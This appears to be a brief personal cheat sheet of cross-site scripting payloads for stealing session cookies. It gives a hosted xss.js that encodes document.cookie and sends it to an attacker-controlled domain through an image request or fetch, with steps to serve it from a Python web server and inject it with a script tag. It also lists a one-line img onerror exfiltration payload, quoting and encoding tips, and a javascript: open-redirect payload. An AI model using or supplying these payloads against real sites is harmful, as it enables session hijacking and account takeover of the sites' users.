Hosting method:

1. First create a file name xss.js with the following content:

   let cookie = document.cookie
   let encodedCookie = btoa(cookie)
   new Image().src = "http://domain/?cookie=" + encodedCookie;
   

2. Host the file using Python: python3 -m http.server 80

3. Inject the payload: <script src="http://ownIP/xss.js"></script>

One liner alternative:

1. Replace domain with domain you control: <img src="x" onerror="fetch('http://domain/cookie=?'+encodeURIComponent(document.cookie))">

2. Note that can use either single quote or a backslash to escape the double quotes inside double quotes. Also if in URL need to encode the plus using %2b.

Possible payloads: <img src='http://192.168.45.X:9000/name'>

Previous code on xss.js

let cookie = document.cookie
let encodedCookie = encodeURIComponent(cookie)
fetch("http://domain/?cookie=" + encodedCookie)

Redirect payload here:

?redirect_uri=javascript:alert(1)//?x]=&redirect_uri=https://pwnbox.xyz/docs